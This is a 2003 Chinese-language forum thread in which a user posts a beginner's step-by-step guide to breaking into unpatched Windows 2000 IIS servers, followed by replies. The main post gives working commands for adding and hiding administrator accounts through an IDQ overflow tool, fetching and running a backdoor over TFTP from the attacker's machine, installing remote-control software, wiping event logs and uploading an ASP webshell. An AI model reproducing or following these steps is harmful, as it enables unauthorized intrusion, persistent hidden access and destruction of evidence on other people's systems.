20CN网络安全小组论坛 - 菜鸟乐园

论坛: 菜鸟乐园标题: 闯网者经验总结

作者: robbines [blueye]

论坛用户

我下面给一些菜鸟讲解一下如何入侵现在的网络，主要针对win2000操作系统。继微软打了sp3的补丁以后，可以说挡住了很多利用以前旧漏洞入侵他人计算机的菜鸟，像什么输入法漏洞，针对iis的idq,ida溢出漏洞等，这些可能大家太熟悉不过了。可是现在很难找到这样的主机。我们还有其他的办法吗？当然有了，我给大家介绍几个方法。其中很多涉及工具的使用，要认真看哦。
注意，我们的入侵平台也必须是win2000专业或服务器版。
入侵第一步：扫描网段，（如果你是高手当然不必如此，因为这样即浪费金钱，又浪费时间，而且等于是在检查主机安全性，但我们要从菜鸟到高手，这步是必须的。)怎样找ip地址呢？到搜狐上去，用浏览器打开网页，在网页打开过程中我们会看到浏览器左下脚他的ip地址，或者我们在cmd命令行中输入：ping www.hack.com.cn,马上会得到它的ip地址。我们还是拿www服务器来练习，先扫描提供该服务的服务器，也就是打开80端口的机器。扫端口最快的还是scanner了。在扫描范围中我们添入ip段从192.168.0.1-192.168.0.254,(此地址为局域网当中的虚拟地址，在互连网当中你看不到这个地址)，所有端口定义中我们只添80就好了，扫描开始，结果这么多，哪些是我们的目标呢？显示为:"http/1.1 500 server error..server:microsoft-iis/5.0..date:wed,29....."后面省略不写了，为什么我们要这样的机器呢，因为它安装了iis而且它多半没有打补丁，所以漏洞依然存在了，这部扫描很关键，大家要注意。下面就拿出其中的某一个主机来进行漏洞入侵。
拿出我推荐给大家的xscan_gui，安全焦点下载最新版2.3。相当厉害的扫描器，打开xscan,ctrl+M，在扫描范围中我们选cgi和iis漏洞，如果扫描结果中没有很快的出现红色的漏洞说明或是只扫到idq或ida漏洞，那我们换下一台主机，因为这台打了sp3了。如果扫到cgi和iis漏洞的话，那么等于我们已经拿到管理员权限了。
第二步：拿到超级用户的权限。我们刚扫到一台有idq漏洞的机器，可以用snake的idq溢出程序，加一个用户，选好操作系统类型后，在“要绑定的命令”中添上cmd.exe /c net user hack 1234 /add(注意1234后要有空格),发送数据完成，我们再加一个用户叫做winshell,密码是1234，这很有必要，后面有用。
先不要马上把它添加到管理员组，因为你不知道管理员组组名是不是administrator,很多有经验的管理员把它该掉了，怎么办呢？有办法。我们拿出ntcmd tool，记得流光工具里有，我们用刚才的用户连上去吧，看看有哪些用户，net user命令显示：administrator等，这个用户是管理员，我们看看他属于哪个组，net user administrator显示本地组会员：*winadmin,*users.哈，果然改名了，下面我们再拿出idq溢出工具，在绑定命令中添好cmd.exe /c net localgroup winadmin hack /add,到此我们已经拿到管理员权限了，（有些人问到：“idq溢出不是打开一个端口吗？没错，但当你用nc连接以后，只能执行一条命令然后再从新溢出才行。这不是很麻烦吗？”）。让我喝口水，喘喘气吧，不行，管理员既然改了管理员组名，他也一定会发现该组多了一个用户的，好我们继续，拿出小榕的克隆帐号工具ca和cca,ca \\192.168.0.1 hack 1234 winshell 1234 ，数据发送完毕，然后用cca检查一下cca \\192.168.0.1 winshell 1234,结果是winshell as same as administrator说明成功了，而且这个帐户通过帐户管理器是发现不了在管理员组的，这下可以放心休息一下了。
第三步：后门安装。对于拨号学入侵的菜鸟来说，后门的大小决定了入侵的成功率。我下面来具体对当今流行的后门作下介绍，lion写的hall功能很强，但是安装出现失败的机率很高；至于telnet后门，我觉得很容易被发现，初学者的最爱还是wollf吧，这可是安焦的女黑客作品哦，我们男同志可要加油了。准确说，这是一个命令行的remote control tool,先上传好了，我们采用逆向连接方式，找到tftp32，将wollf.exe放到f：\根目录下，base directory选择f:\，server inerfaces添上自己的ip地址(192.168.0.2)。然后我们再拿出ntcmd，用winshell用户连接，把刚才加的hack删掉吧，net user hack /del ,tftp -i 192.168.0.2 get wollf.exe c:\winnt\system32\wollf.exe,好了看到数据传输了吧，不到一分钟，一切搞定。下面只要执行它就好了，怎么执行，这很简单，在ntcmd中输入c:\winnt\system32\wollf.exe，怎么样，后门安装完毕，自动打开7614端口，我们在自己机器上打开cmd，敲wollf -connect 192.168.0.1 7614，连上后，在#后面敲dos，就和在自己机器上一样使用了，使用中会由于网络问题出现间断现象，那就换上ADSL宽带吧。
第四步：安装win2000客户端。很多菜鸟要求使用图形工具方便直观，满足你们好了。如上面上传wollf.exe一样，我们上传hbulot.exe，你可以在黑白网络下载。然后用ntcmd执行：hbulot.exe /r后，对方马上重起并打开服务。然后就可以用2000可户端连接了。简单吧？
第五步：擦除日志。可以在2000客户端连接以后在计算机管理里面清除掉所有日志，因为我们在这没办法选择删除，全删了算了。
以上四步是最简单的入侵手段，也是集成了当今的一些入侵思路，可以帮助大家练习。下面再说说碰到特殊的主机怎么办，所谓特殊，也就是，网管使用防火墙过滤，只允许外界和自己的某些端口连接，我们安装后门也没用处，别急，方法很多了，我们可以利用端口反弹技术，让主机自动和我们连接，比如网络神偷等，在这我给大家介绍一个不用此原理仍可以使用的工具，我们利用它开的80端口啊？想起来了吗？aspmm海洋顶端网木马，这个工具是用asp写的，我们将他里面的几个文件上传到它的web目录下面。在浏览器中敲入:192.168.0.1\index.asp,密码添www.haiyang.wzr.net，怎么样很方便是不是，这个密码可以在上传前更改。密码存在index.asp文件中,用原文件查看，就看到密码了。方便的东西功能也少，只有上传功能，不过仔细研究还是用处很大，使用此工具，对方必须支持asp,和文件系统控件的使用。
总结：相信大家在按照上面的方法执行的话，一定会对入侵有初步体会的。如果有事请大家联系我的qq:56496792.祝大家好运。
robbines
2003.1.29

地主发表时间: 01/29 23:58

回复: jiantian [jiantian]

论坛用户

关于idq漏洞，当知道对方有这个漏洞后，怎么判断对方的系统类型？？
谢谢-----

B1层发表时间: 01/30 00:23

回复: bedlamite [bedlamite]

版主

还行！

不过不推荐使用wollf，因为它上了病毒库,很容易被del。

B2层发表时间: 01/30 00:39

回复: junjuntop [junjuntop]

论坛用户

文章转载的吗？

B3层发表时间: 01/30 09:53

回复: junjuntop [junjuntop]

论坛用户

文章转载的吗？

B4层发表时间: 01/30 09:54

回复: baboo [baboo]

论坛用户

呵呵，显然是的啊。不过应该多支持啊。现在很少看到好看的，技术性的文章啦，以后多发一点啊。

B5层发表时间: 01/30 14:02

回复: robbines [blueye]

论坛用户

很不好意思过了两个月才给大家回复，因为一直忙着考试，请大家谅解！
下面回答朋友们提到的几个问题:
1.有关系统版本问题,至于是哪个语种这太简单了,
登陆看看网站是哪种语言就清楚了,现在打补丁到sp2的概率要大一些,如果
没有成功,那就再试试sp1和sp0吧,只要你扫到的机器符合我文章中所说的条
件,我保证你一定会成功的.
2.至于wollf是否能被杀毒软件查杀我还没有证实,好用的东西经常被菜鸟们拿作入门的武器,病毒厂商当然不能不防了,问题是现在我们还没有能力自己写出这样的工具,所以大家只是把它当作练习来用.总之一句话,大家提高水平是关键.
3.《闯网者经验总结》不是转载作品，是本人根据假期经验总结出来的，目的只是想给一些渴望入侵但没有成功的菜鸟们一些较实用的方法和入侵中常遇到的问题，由于本人水平有限，有些地方可能说的比较模糊，希望大家多提问题我会给大家答复．
最后我再提醒大家,很多人以为自己可以熟练的操作前辈们写的工具就可以达到
轻松入侵的目的,其实正好相反,工具现在用的好,补丁打的也勤啊,所以你不可能把一种漏洞用到所有的机器当中,但是如果我们把重点放在提高自己对系统的基本认识,对漏洞原理的了解,提高自己的编程水平,才可以作到游刃有余,那么任何机器我们都可以闯进去了,另外提醒大家不要进行破坏,为维护网络安全作出自己的一份贡献.
robbines
2003.4.1

B6层发表时间: 04/04 10:28

论坛: 菜鸟乐园